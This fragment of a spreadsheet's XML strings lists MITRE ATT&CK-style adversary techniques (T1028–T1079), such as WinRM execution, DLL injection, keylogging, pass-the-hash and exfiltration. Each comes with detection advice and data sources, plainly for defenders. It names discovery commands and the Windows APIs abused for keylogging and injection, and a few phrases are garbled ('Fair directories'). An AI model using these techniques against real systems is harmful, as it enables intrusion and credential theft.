  </si>
  <si>
    <t>Network protocol analysis,Process use of network,Binary file metadata,File monitoring,Malware reverse engineering,System calls</t>
  </si>
  <si>
    <t>Execution,Lateral Movement</t>
  </si>
  <si>
    <t>T1028</t>
  </si>
  <si>
    <t>Windows Remote Management (WinRM) is the name of both a Windows service and a protocol that allows a user to interact with a remote system (e.g., run an executable, modify the Registry, modify services). It may be called with the winrm command or by any number of programs such as PowerShell.</t>
  </si>
  <si>
    <t>Monitor use of WinRM within an environment by tracking service execution. If it is not normally used or is disabled, then this may be an indicator of suspicious behavior. Monitor processes created and actions taken by the WinRM process or a WinRM invoked script to correlate it with other related events.</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>T1029</t>
  </si>
  <si>
    <t>Data exfiltration may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Command and Control Channel and Exfiltration Over Alternative Protocol.</t>
  </si>
  <si>
    <t>Monitor process file access patterns and network behavior. Unrecognized processes or scripts that appear to be traversing file systems and sending network traffic may be suspicious. Network connections to the same destination that occur at the same time of day for multiple days are suspicious.</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Process monitoring,Signature matching</t>
  </si>
  <si>
    <t>T1030</t>
  </si>
  <si>
    <t>An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows. If a process maintains a long connection during which it consistently sends fixed size data packets or a process opens connections and sends fixed sized data packets at regular intervals, it may be performing an aggregate data transfer. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Process monitoring,Signature matching</t>
  </si>
  <si>
    <t>T1031</t>
  </si>
  <si>
    <t>Windows service configuration information, including the file path to the service's executable, is stored in the Registry. Service configurations can be modified using utilities such as sc.exe and Reg. Adversaries can modify an existing service to persist malware on a system by using system utilities or by using custom tools to interact with the Windows API. Use of existing services is a type of Masquerading that may make detection analysis more challenging. Modifying existing services may interrupt their functionality or may enable services that are disabled or otherwise not commonly used.</t>
  </si>
  <si>
    <t>Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.Command-line invocation of tools capable of modifying services may be unusual, depending on how systems are typically used in a particular environment. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute cmd commands or scripts.Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Services may also be modified through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process command-line parameters,Process monitoring,Services,PowerShell logs</t>
  </si>
  <si>
    <t>T1032</t>
  </si>
  <si>
    <t>Adversaries use command and control over an encrypted channel using a known encryption protocol like HTTPS or SSL/TLS. The use of strong encryption makes it difficult for defenders to detect signatures within adversary command and control traffic. Some adversaries may use other encryption protocols and algorithms with symmetric keys, such as RC4, that rely on encryption keys encoded into malware configuration files and not public key cryptography. Such keys may be obtained through malware reverse engineering.</t>
  </si>
  <si>
    <t>SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.19 SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.If malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures.In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used.18</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Malware reverse engineering,Process use of network,Process monitoring,SSL/TLS inspection,Signature matching</t>
  </si>
  <si>
    <t>T1033</t>
  </si>
  <si>
    <t>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using Credential Dumping. The information may be collected in a number of different ways using other Discoverytechniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs.</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</si>
  <si>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 and PowerShell.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Process command-line parameters,API Monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1034</t>
  </si>
  <si>
    <t>Path interception occurs when an executable is placed in a specific path so that it is executed by an application instead of the intended target. One example of this was the use of a copy of cmd in the current working directory of a vulnerable application that loads a CMD or BAT file with the CreateProcess function.</t>
  </si>
  <si>
    <t>Monitor file creation for files named after Fair directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for Fair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t>
  </si>
  <si>
    <t>File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>T1035</t>
  </si>
  <si>
    <t>Adversaries may execute a binary, command, or script via a method that interacts with Windows services, such as the Service Control Manager. This can be done by either creating a new service or modifying an existing service. This technique is the execution used in conjunction with New Service and Modify Existing Service during service persistence or privilege escalation.</t>
  </si>
  <si>
    <t>Changes to service Registry entries and command-line invocation of tools capable of modifying services that do not correlate with known software, patch cycles, etc., may be suspicious. If a service is used only to execute a binary or script and not to persist, then it will likely be changed back to its original form shortly after the service is restarted so the service is not left broken, as is the case with the common administrator tool PsExec.</t>
  </si>
  <si>
    <t>Process command-line parameters,Process monitoring,Windows Registry</t>
  </si>
  <si>
    <t>T1036</t>
  </si>
  <si>
    <t>Masquerading occurs when a malicious executable is placed in a commonly trusted location (such as C:\Windows\System32) or named with a common name (such as "explorer.exe" or "svchost.exe") to bypass tools that trust executables by relying on file name or path. This also may be done to deceive defenders and system administrators into thinking a file is benign by name association to something that is known to be legitimate.</t>
  </si>
  <si>
    <t>Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Binary file metadata</t>
  </si>
  <si>
    <t>Lateral Movement,Persistence</t>
  </si>
  <si>
    <t>T1037</t>
  </si>
  <si>
    <t>Windows allows logon scripts to be run whenever a specific user or group of users log into a system. The scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. If adversaries can access these scripts, they may insert additional code into the logon script to execute their tools when a user logs in. This code can allow them to maintain persistence on a single system, if it is a local script, or to move laterally within a network, if the script is stored on a central server and pushed to many systems. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.</t>
  </si>
  <si>
    <t>Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Defense Evasion,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>T1038</t>
  </si>
  <si>
    <t>Windows systems use a common method to look for required DLLs to load into a program. Adversaries may take advantage of the Windows DLL search order and programs that ambiguously specify DLLs to gain privilege escalation and persistence. Adversaries may perform DLL preloading, also called binary planting attacks,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 Adversaries may use this behavior to cause the program to load a malicious DLL. Adversaries may also directly modify the way a program loads DLLs by replacing an existing DLL or modifying a .manifest or .local redirection file, directory, or junction to cause the program to load a different DLL to maintain persistence or privilege escalation</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</si>
  <si>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 Disallow loading of remote DLLs</t>
  </si>
  <si>
    <t>File monitoring,DLL monitoring,Process monitoring</t>
  </si>
  <si>
    <t>T1039</t>
  </si>
  <si>
    <t>Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Adversaries may search network shares on computers they have compromised to find files of interest. Interactive command shells may be in use, and common functionality within cmd may be used to gather information.</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as Windows Management Instrumentation and PowerShell.</t>
  </si>
  <si>
    <t>File monitoring,Process monitoring,Authentication logs,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1040</t>
  </si>
  <si>
    <t>Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. User credentials may be sent over an insecure, unencrypted protocol that can be captured and obtained through network packet analysis. An adversary may place a network interface into promiscuous mode, using a utility to capture traffic in transit over the network or use span ports to capture a larger amount of data. In addition, Address Resolution Protocol (ARP) and Domain Name Service (DNS) poisoning can be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.</t>
  </si>
  <si>
    <t>Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a man-in-the-middle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t>
  </si>
  <si>
    <t>Network device logs,Network device interface,Netflow/Enclave netflow,Authentication logs</t>
  </si>
  <si>
    <t>T1041</t>
  </si>
  <si>
    <t>Data exfiltration is performed over the Command and Control channel. Data is encoded into the normal communications channel using the same protocol as command and control communications.</t>
  </si>
  <si>
    <t>Process use of network,Signature matching,Netflow/Enclave netflow,Packet capture</t>
  </si>
  <si>
    <t>T1042</t>
  </si>
  <si>
    <t>When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access.Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.</t>
  </si>
  <si>
    <t>Collect and analyze changes to Registry keys that associate file extensions to default applications for execution and correlate with unknown process launch activity or unusual file types for that process. User file association preferences are stored under [HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts and override associations configured under [HKEY_CLASSES_ROOT]. Changes to a user's preference will occur under this entry's subkeys.Also look for abnormal process call trees for execution of other commands that could relate to Discovery actions or other techniques.</t>
  </si>
  <si>
    <t>Windows Registry,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>T1043</t>
  </si>
  <si>
    <t>Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. </t>
  </si>
  <si>
    <t>T1044</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Services,Process monitoring</t>
  </si>
  <si>
    <t>T1045</t>
  </si>
  <si>
    <t>Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Utilities used to perform software packing are called packers. Example packers are MPRESS and UPX. A more comprehensive list of known packers is available, but adversaries may create their own packing techniques that do not leave the same artifacts as well-known packers to evade defenses.</t>
  </si>
  <si>
    <t>Use file scanning to look for known software packers or artifacts of packing techniques. Packing is not a definitive indicator of malicious activity, because legitimate software may use packing techniques to reduce binary size or to protect proprietary code.</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>T1046</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</si>
  <si>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</si>
  <si>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Netflow/Enclave netflow,Network protocol analysis,Process use of network,Signature matching</t>
  </si>
  <si>
    <t>T1047</t>
  </si>
  <si>
    <t>Windows Management Instrumentation (WMI) is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135. An adversary can use WMI to interact with local and remote systems and use it as a means to perform many tactic functions, such as gathering information for Discovery and remote Execution of files as part of Lateral Movement.</t>
  </si>
  <si>
    <t>Monitor network traffic for WMI connections; the use of WMI in environments that do not typically use WMI may be suspect. Perform process monitoring to capture command-line arguments of "wmic" and detect commands that are used to perform remote behavior.</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process command-line parameters,Process monitoring,Windows event logs, WMI objects</t>
  </si>
  <si>
    <t>T1048</t>
  </si>
  <si>
    <t>Data exfiltration is performed with a different protocol from the main command and control protocol or channel. The data is likely to be sent to an alternate network location from the main command and control server. Alternate protocols include FTP, SMTP, HTTP/S, DNS, or some other network protocol. Different channels could include Internet Web services such as cloud storage.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows. Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used</t>
  </si>
  <si>
    <t>Process monitoring,Process use of network,Packet capture,Netflow/Enclave netflow,Network protocol analysis,Signature matching</t>
  </si>
  <si>
    <t>T1049</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of network connections to or from the compromised system. Utilities and commands that acquire this information include netstat, "net use," and "net session" with Net.</t>
  </si>
  <si>
    <t>T1050</t>
  </si>
  <si>
    <t>When operating systems boot up, they can start programs or applications called services that perform background system functions. A service's configuration information, including the file path to the service's executable, is stored in the Windows Registry. Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.</t>
  </si>
  <si>
    <t>Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,Process command-line parameters,Windows event logs,WMI objects,PowerShell logs</t>
  </si>
  <si>
    <t>T1051</t>
  </si>
  <si>
    <t>Adversaries may add malicious content to an internally accessible website through an open network file share that contains the website's webroot or Web content directory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 This mechanism of shared access and remote execution could be used for lateral movement to the system running the Web server. For example, a Web server running PHP with an open network share could allow an adversary to upload a remote access tool and PHP script to execute the RAT on the system running the Web server when a specific page is visited.</t>
  </si>
  <si>
    <t>Use file and process monitoring to detect when files are written to a Web server by a process that is not the normal Web server process or when files are written outside of normal administrative time periods. Use process monitoring to identify normal processes that run on the Web server and detect processes that are not typically executed.</t>
  </si>
  <si>
    <t>T1052</t>
  </si>
  <si>
    <t>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</si>
  <si>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Monitor file access on removable media. Detect processes that execute when removable media are mounted.</t>
  </si>
  <si>
    <t>Data loss prevention,File monitoring,Local port monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Execution,Persistence,Privilege Escalation</t>
  </si>
  <si>
    <t>T1053</t>
  </si>
  <si>
    <t>Utilities such as at and schtasks, along with the Windows Task Scheduler, can be used to schedule programs or scripts to be executed at a date and time. The account used to create the task must be in the Administrators group on the local system. A task can also be scheduled on a remote system, provided the proper authentication is met to use RPC and file and printer sharing is turned on. An adversary may use task scheduling to execute programs at system startup or on a scheduled basis for persistence, to conduct remote Execution as part of Lateral Movement, to gain SYSTEM privileges, or to run a process under the context of a specified account.</t>
  </si>
  <si>
    <t>Monitor scheduled task creation from common utilities using command-line invocation. Legitimate scheduled tasks may be created during installation of new software or through system administration functions. Monitor process execution from the Windows Task Scheduler taskeng.exe. If scheduled tasks are not used for persistence, then the adversary is likely to remove the task when the action is complete. Monitor Windows Task Scheduler stores in %systemroot%\System32\Tasks for change entries related to scheduled tasks that do not correlate with known software, patch cycles, etc. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Authentication logs,Windows event logs,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>T1054</t>
  </si>
  <si>
    <t>An adversary may attempt to block indicators or events from leaving the host machine. In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process or creating a host-based firewall rule to block traffic to a specific server.</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.</t>
  </si>
  <si>
    <t>Sensor health and status,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Defense Evasion,Privilege Escalation</t>
  </si>
  <si>
    <t>T1055</t>
  </si>
  <si>
    <t>DLL injection is used to run code in the context of another process by causing the other process to load and execute code. Running code in the context of another process provides adversaries many benefits, such as access to the process's memory and permissions. It also allows adversaries to mask their actions under a legitimate process. A more sophisticated kind of DLL injection, reflective DLL injection, loads code without calling the normal Windows API calls, potentially bypassing DLL load monitoring. Numerous methods of DLL injection exist on Windows, including modifying the Registry, creating remote threads, Windows hooking APIs, and DLL pre-loading.</t>
  </si>
  <si>
    <t>Monitoring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API calls such as CreateRemoteThread and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique.</t>
  </si>
  <si>
    <t>API monitoring,Windows Registry,File monitoring,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>Collection,Credential Access</t>
  </si>
  <si>
    <t>T1056</t>
  </si>
  <si>
    <t>Adversaries can use methods of capturing user input for obtaining credentials for Legitimate Credentials and information Collection that include keylogging and user input field interception.</t>
  </si>
  <si>
    <t>Keyloggers may take many forms, possibly involving modification to the Registry and installation of a driver, setting a hook, or polling to intercept keystrokes. Commonly used API calls include SetWindowsHook, GetKeyState, and GetAsynceyState. Monitor the Registry and file system for such changes and detect driver installs, as well as looking for common keylogging API calls. API calls alone are not an indicator of keylogging, but may provide behavioral data that is useful when combined with other information such as new files written to disk and unusual processes. Monitor the Registry for the addition of a Custom Credential Provider. Detection of compromised Legitimate Credentials in use by adversaries may help to catch the result of user input interception if new techniques are used.</t>
  </si>
  <si>
    <t>Windows Registry,Process monitoring,API monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1057</t>
  </si>
  <si>
    <t>Adversaries may attempt to get information about running processes on a system. An example command that would obtain details on processes is "tasklist" using the Tasklist utility. Information obtained could be used to gain an understanding of common software running on systems within the network.</t>
  </si>
  <si>
    <t>T1058</t>
  </si>
  <si>
    <t>If the permissions for users and groups to access the binPath/ImagePath Registry value for a service are not properly secured, adversaries can change the path to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute.</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path is changed to a location that is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</si>
  <si>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Process command-line parameters,Services,Windows Registry,API monitoring,Authentication logs,PowerShell logs</t>
  </si>
  <si>
    <t>T1059</t>
  </si>
  <si>
    <t>Command-line interfaces provide a way of interacting with computer systems and is a common feature across many types of operating system platforms. One example command-line interface on Windows systems is cmd, which can be used to perform a number of tasks including execution of other software. Command-line interfaces can be interacted with locally or remotely via a remote desktop application, reverse shell session, etc. Commands that are executed run with the current permission level of the command-line interface process unless the command includes process invocation that changes permissions context for that execution (e.g. Scheduled Task). Adversaries may use command-line interfaces to interact with systems and execute other software during the course of an operation.</t>
  </si>
  <si>
    <t>Command-line interface activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools.</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>T1060</t>
  </si>
  <si>
    <t>Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. The program will be executed under the context of the user and will have the account's associated permissions level. Adversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use Masquerading to make the Registry entries look as if they are associated with legitimate programs.</t>
  </si>
  <si>
    <t>Monitor Registry for changes to run keys that do not correlate with known software, patch cycles, etc. Monitor the start folder for additions or changes. Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing the run keys' Registry locations and startup folders. Suspicious program execution as startup programs may show up as outlier processes that have not been seen before when compared against historical data. Changes to these locations typically happen under normal conditions when legitimate software is installed.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</si>
  <si>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Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>T1061</t>
  </si>
  <si>
    <t>Cause a binary or script to execute based on interacting with the file through a graphical user interface (GUI) or in an interactive remote session such as Remote Desktop Protocol.</t>
  </si>
  <si>
    <t>Detection of execution through the GUI will likely lead to significant false positives. Other factors should be considered to detect misuse of services that can lead to adversaries gaining access to systems through interactive remote sessions.</t>
  </si>
  <si>
    <t>Windows event logs,Process command-line parameters,Process monitoring,Authentication logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1062</t>
  </si>
  <si>
    <t>A type-1 hypervisor is a software layer that sits between the guest operating systems and system's hardware. It presents a virtual running environment to an operating system. An example of a common hypervisor is Xen. A type-1 hypervisor operates at a level below the operating system and could be designed with Rootkit functionality to hide its existence from the guest operating system. A malicious hypervisor of this nature could be used to persist on systems through interruption.</t>
  </si>
  <si>
    <t>Type-1 hypervisors may be detected by performing timing analysis. Hypervisors emulate certain CPU instructions that would normally be executed by the hardware. If an instruction takes orders of magnitude longer to execute than normal on a system that should not contain a hypervisor, one may be present.</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>T1063</t>
  </si>
  <si>
    <t>Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on the system. This may include things such as local firewall rules, anti-virus, and virtualization. These checks may be built into early-stage remote access tools. Example commands that can be used to obtain security software information are netsh, reg query with Reg, dir with cmd, and Tasklist, but other indicators of discovery behavior may be more specific to the type of software or security system the adversary is looking for.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Authentication logs,API monitoring,PowerShell logs</t>
  </si>
  <si>
    <t>Defense Evasion,Execution</t>
  </si>
  <si>
    <t>T1064</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</si>
  <si>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 Many popular offensive frameworks exist which use forms of scripting for security testers and adversaries alike. Metasploit, Veil, and PowerSploit are three examples that are popular among penetration testers for exploit and post-compromise operations and include many features for evading defenses. Some adversaries are known to use PowerShell.</t>
  </si>
  <si>
    <t>Scripting may be common on admin, developer, or power user systems, depending on job function.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</si>
  <si>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Process monitoring,File monitoring,Process command-line parameters,Authentication logs</t>
  </si>
  <si>
    <t>T1065</t>
  </si>
  <si>
    <t>Adversaries may conduct C2 communications over a non-standard port to bypass proxies and firewalls that have been improperly configured.</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</si>
  <si>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t>
  </si>
  <si>
    <t>Netflow/Enclave netflow,Process use of network,Packet capture</t>
  </si>
  <si>
    <t>T1066</t>
  </si>
  <si>
    <t>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use Software Packing or otherwise modify the file so it has a different signature, and then re-use the malware.</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Process use of network,Anti-virus,Binary file metadata,Process command-line parameters,Process monitoring,File monitoring</t>
  </si>
  <si>
    <t>T1067</t>
  </si>
  <si>
    <t>A bootkit is a malware variant that modifies the boot sectors of a hard drive, including the Master Boot Record (MBR) and Volume Boot Record (VBR). Adversaries may use bootkits to persist on systems at a layer below the operating system, which may make it difficult to perform full remediation unless an organization suspects one was used and can act accordingly.</t>
  </si>
  <si>
    <t>Perform integrity checking on MBR and VBR. Take snapshots of MBR and VBR and compare against known good samples. Report changes to MBR and VBR as they occur for indicators of suspicious activity and further analysis.</t>
  </si>
  <si>
    <t>MBR,VBR</t>
  </si>
  <si>
    <t>Credential Access,Defense Evasion,Lateral Movement,Privilege Escalation</t>
  </si>
  <si>
    <t>T1068</t>
  </si>
  <si>
    <t>Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. Exploiting software vulnerabilities may allow adversaries to run a command or binary on a remote system for lateral movement, escalate a current process to a higher privilege level, or bypass security mechanisms. Exploits may also allow an adversary access to privileged accounts and credentials. One example of this is MS14-068, which can be used to forge Kerberos tickets using domain user permissions.</t>
  </si>
  <si>
    <t>Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Software and operating system crash reports may contain useful contextual information about attempted exploits that correlate with other malicious activity. Exploited processes may exhibit behavior that is unusual for the specific process, such as spawning additional processes or reading and writing to files.</t>
  </si>
  <si>
    <t>Windows Error Reporting,File monitoring,Process monitoring,Syslog monitoring,Windows event logs</t>
  </si>
  <si>
    <t>T1069</t>
  </si>
  <si>
    <t>Adversaries may attempt to find local system or domain-level groups and permissions settings. Examples of commands that can list groups are net group /domain and net localgroup using the Net utility.</t>
  </si>
  <si>
    <t>API monitoring,Process command-line parameters,Process monitoring,PowerShell logs,Syslog monitoring,Authentication logs</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated event files on a host system, including potentially captured files such as quarantined malware. This may compromise the integrity of the security solution, causing events to go unreported, or make forensic analysis and incident response more difficult due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Events not stored on the file system will require different detection mechanisms.</t>
  </si>
  <si>
    <t>File monitoring,Process command-line parameters,Process monitoring,Syslog monitoring</t>
  </si>
  <si>
    <t>T1071</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</si>
  <si>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 For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are RPC, SSH, or RDP.</t>
  </si>
  <si>
    <t>Analyze network data for uncommon data flows . Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect application layer protocols that do not follow the expected protocol for the port that is being used.</t>
  </si>
  <si>
    <t>Packet capture,Netflow/Enclave netflow,Process use of network,Malware reverse engineering,Process monitoring,Signature matching</t>
  </si>
  <si>
    <t>T1072</t>
  </si>
  <si>
    <t>Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.). If an adversary gains access to these systems, then they may be able to execute code. Adversaries may gain access to and use third-party application deployment systems installed within an enterprise network.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t>
  </si>
  <si>
    <t>Perform application deployment at regular times so that irregular deployment activity stands out. Monitor process activity that does not correlate to known good software. Monitor account login activity on the deployment system.</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process monitoring,Process use of network,Third-party application logs,Windows Registry,Authentication logs</t>
  </si>
  <si>
    <t>T1073</t>
  </si>
  <si>
    <t>Programs may specify DLLs that are loaded at runtime. Programs that improperly or vaguely specify a required DLL may be open to a vulnerability in which an unintended DLL is loaded. Side-loading vulnerabilities specifically occur when Windows Side-by-Side (WinSxS) manifests are not explicit enough about characteristics of the DLL to be loaded. Adversaries may take advantage of a legitimate program that is vulnerable to side-loading to load a malicious DLL. Adversaries likely use this technique as a means of masking actions they perform under a legitimate, trusted system or software process.</t>
  </si>
  <si>
    <t>Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track DLL metadata, such as a hash, and compare DLLs that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Process use of network,Process monitoring,Loaded DLLs,File monitoring</t>
  </si>
  <si>
    <t>T1074</t>
  </si>
  <si>
    <t>Collected data is staged in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as Data Compressed or Data Encrypted. Interactive command shells may be used, and common functionality within cmd may be used to copy data into a staging location.</t>
  </si>
  <si>
    <t>Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files.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 and PowerShell.</t>
  </si>
  <si>
    <t>T1075</t>
  </si>
  <si>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 Windows 7 and higher with KB2871997 require valid domain user credentials or RID 500 administrator hashes.</t>
  </si>
  <si>
    <t>Audit all logon and credential use events and review for discrepancies. Unusual remote logins that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity. NTLM LogonType 3 authentications that are not associated to a domain login and are not anonymous logins are suspicious.</t>
  </si>
  <si>
    <t>Authentication logs,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>T1076</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</si>
  <si>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 There are other implementations and third-party tools that provide graphical access Remote Services similar to RDS.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 technique for Persistence.</t>
  </si>
  <si>
    <t>Use of RDP may be legitimate, depending on the network environment and how it is used. Other factors, such as access patterns and activity that occurs after a remote login, may indicate suspicious or malicious behavior with RDP. Monitor for user accounts logged into systems they would not normally access or access patterns to multiple systems over a relatively short period of time.</t>
  </si>
  <si>
    <t>Authentication logs,Netflow/Enclave netflow,Process monitoring,Process command-line parameters</t>
  </si>
  <si>
    <t>T1077</t>
  </si>
  <si>
    <t>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Legitimate Credentials to remotely access a networked system over server message block (SMB) to interact with systems using remote procedure calls (RPCs), transfer files, and run transferred binaries through remote Execution. Example execution techniques that rely on authenticated sessions over SMB/RPC are Scheduled Task, Service Execution, and Windows Management Instrumentation. Adversaries can also use NTLM hashes to access administrator shares on systems with Pass the Hash and certain configuration and patch levels.The Net utility can be used to connect to Windows admin shares on remote systems with valid credentials to enable lateral movement.</t>
  </si>
  <si>
    <t>Ensure that proper logging of accounts used to log into systems is turned on and centrally collected. Windows logging is able to collect success/failure for accounts that may be used to move laterally and can be collected using tools such as Windows Event Forwarding. Monitor remote login events and associated SMB activity for file transfers and remote process execution. Monitor the actions of remote users who connect to administrative shares. Monitor for use of tools and commands to connect to remote shares, such as Net, on the command-line interface and Discovery techniques that could be used to find remotely accessible systems.</t>
  </si>
  <si>
    <t>Process use of network,Authentication logs,Process command-line parameters,Process monitoring,Windows event logs</t>
  </si>
  <si>
    <t>T1078</t>
  </si>
  <si>
    <t>Adversaries may steal the credentials of a specific user or service account using Credential Access techniques. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network and may even be used for persistent access to remote systems.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The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) to bypass access controls set within the enterprise.</t>
  </si>
  <si>
    <t>Configure robust, consistent account activity audit policies across the enterprise.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entered the building or does not have VPN access).</t>
  </si>
  <si>
    <t>Authentication logs,Windows event logs,Syslog monitoring</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</t>
  </si>
  <si>
